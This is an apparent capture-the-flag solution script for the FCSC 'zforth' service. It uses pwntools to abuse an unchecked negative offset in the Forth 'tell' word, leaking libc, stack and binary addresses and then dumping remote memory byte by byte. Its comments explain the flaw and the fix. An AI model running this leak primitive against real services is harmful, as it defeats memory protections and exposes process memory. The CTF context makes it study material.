"""Remote memory-dump helper for the zforth CTF service (FCSC, port 2105).

Every request is one Forth line of the form ``<offset> <len> tell`` sent over
the socket; the reply line is taken verbatim as the bytes the remote ``tell``
word returned for that offset.  The script first reads three 4-byte values at
fixed offsets (named in the constants as a printf GOT entry and two jmp_buf
slots) to learn where libc, the stack and the binary are mapped, then walks
backwards one byte per round trip from a computed negative offset, appending
each reply to ``data`` until ``recvline`` raises, and writes the result to a
file called ``dump``.

From a defensive standpoint the whole script rests on a single property of
the service: ``tell`` accepts offsets that are negative or far outside the
region it is meant to expose (``-404`` returns a pointer-sized value here).
Bounds-checking that argument would close the primitive.  The two string
blocks at the bottom are earlier, disabled variants of the same dump loop.
"""
from pwn import *
import time

# $ -1601776463 5000 tell

HOST = ["challenges.france-cybersecurity-challenge.fr", 2105]

# All constants below are byte offsets handed to the remote ``tell`` word as
# its first argument.  Only PRINTF_GOT_OFFSET, JMPBUF_PIE_LEAK_OFFSET,
# JMPBUF_STACK_LEAK_OFFSET and PIE_LEAK_DIFF_DICT are used by the live path
# below; the others (and ``import time``) look like leftovers from earlier
# iterations -- presumably safe to drop, verify before doing so.
BINARY_START_OFFSET = -20896
PRINTF_GOT_OFFSET = -404
FFLUSH_GOT_OFFSET = -396
FGETS_GOT_OFFSET = -388
FWRITE_GOT_OFFSET = -368
STRLEN_GOT_OFFSET = -352

# LEAKS OFFSETS
JMPBUF_PIE_LEAK_OFFSET = +4128
JMPBUF_STACK_LEAK_OFFSET = +4132

# LEAKS DIFF
PIE_LEAK_DIFF_DICT = +416

# PIE STUFF
STACK_PRINTF_DIFF = 0x7e4d560
DICT_HEAP_DIFF = 0x1cdde60
ENV_OFFSET = -0x5655db6f
STACK_1 = 0xff832000
STACK_2 = 0xfffc9000

# Live target; the commented alternative ran the interpreter locally instead.
p = connect(HOST[0], HOST[1]) #process(["./src/zforth", "core.zf"])
# input("Wait for debugger")
# Drain the banner: whatever arrives within one second, then one more line.
p.recvrepeat(1)
p.recvline()

# Each leak is the first four bytes of the reply, decoded little-endian
# (pwntools ``u32`` default).  A negative offset is accepted by the service
# and answered with a pointer-sized value, which is the bug being exercised.
print ("----------LIBC LEAKING----------")
p.sendline(f"{PRINTF_GOT_OFFSET} 4 tell".encode("utf-8"))
printf_leak = u32(p.recvline()[:4])
print(f"printf @ {hex(printf_leak)}")
print("---------------------------------\n")

print ("----------ASLR LEAKING----------")
p.sendline(f"{JMPBUF_STACK_LEAK_OFFSET} 4 tell".encode("utf-8"))
stack_leak = u32(p.recvline()[:4])
print(f"stack leak @ {hex(stack_leak)}")
print("---------------------------------\n")

print ("----------PIE LEAKING----------")
p.sendline(f"{JMPBUF_PIE_LEAK_OFFSET} 4 tell".encode("utf-8"))
bin_leak = u32(p.recvline()[:4])
print(f"binary leak @ {hex(bin_leak)}")
print("---------------------------------\n")

# start_addr is the leaked binary pointer rebased by a fixed delta; the stack
# leak is used as-is.
start_addr = bin_leak + PIE_LEAK_DIFF_DICT
stack_addr = stack_leak

print(f" START ADDR = {hex(start_addr)}")
print(f" STACK ADDR = {hex(stack_addr)}")

data = b""
count = 0
# Presumably the 32-bit modular distance from stack_addr up to start_addr
# (up to 0xffffffff, then wrapping to start_addr); it is sent negated below.
# TODO confirm against whatever base ``tell`` indexes from.
offset = (0xffffffff - stack_addr) + start_addr
print("Start offset: ", offset)

# Hands the socket to the operator first; the dump loop only starts once the
# interactive session is closed and Enter is pressed at the ``wait`` prompt.
p.interactive()
input("wait")

while True:
    print(f"Reading @ offset -{hex(offset)}...", end=" ")
    # One byte per round trip, at a negative offset that moves down by one
    # each iteration.
    p.sendline(f"-{offset} 1 tell".encode("utf-8"))
    try:
        # strip(b'\n') removes every leading/trailing 0x0a, so a byte that is
        # itself 0x0a is dropped too -- the dump is not byte-exact.
        data += p.recvline().strip(b'\n')
    except Exception as e:
        # Any failure to read a line (EOF, timeout, reset) ends the dump; ``e``
        # is caught but never reported.
        print(f"Reading @ offset {offset}... EOF !")
        break
    # NOTE(review): IndexError if every reply so far stripped down to nothing
    # (data is still b"").
    print(data[-1])
    count += 1
    offset -= 1

# Only reached via the ``break`` above.
p.close()
print(count, "bytes read !!")

with open("dump", "wb") as f:
    f.write(data)

print(data)

# Disabled earlier variants, kept as string literals (no effect at runtime).
"""
curr_data = b""
section_count = 1
offset = 0

while offset != 100_000:
    print(f"Reading @ offset {offset}...", end="\r")
    try:
        p.sendline(f"{offset} 1 tell".encode("utf-8"))
    except:
        print(f"Reading @ offset {offset}... SIGSEV !")
        p = connect(HOST[0], HOST[1])
        p.recvrepeat(1)
        p.recvline()

    try:
        curr_data += p.recvline().strip(b'\n')
    except Exception as e:
        if curr_data != b"":
            print(f"Reading @ offset {offset}... EOF !")
            with open(f"dump-{section_count}", "wb") as f:
                f.write(curr_data)
            curr_data = b""
            section_count += 1
        else:
            print(f"Reading @ offset {offset}... None", end="\r")

    offset += 1

p.close()
"""

"""
data = b""
offset = 0

while True:
    print(f"Reading @ offset {offset}...", end="\r")
    p.sendline(f"{offset} 1 tell".encode("utf-8"))
    try:
        data += p.recvline().strip(b'\n')
    except Exception as e:
        print(f"Reading @ offset {offset}... EOF !")
        break
    offset += 1

p.close()

with open("dump", "wb") as f:
    f.write(data)
"""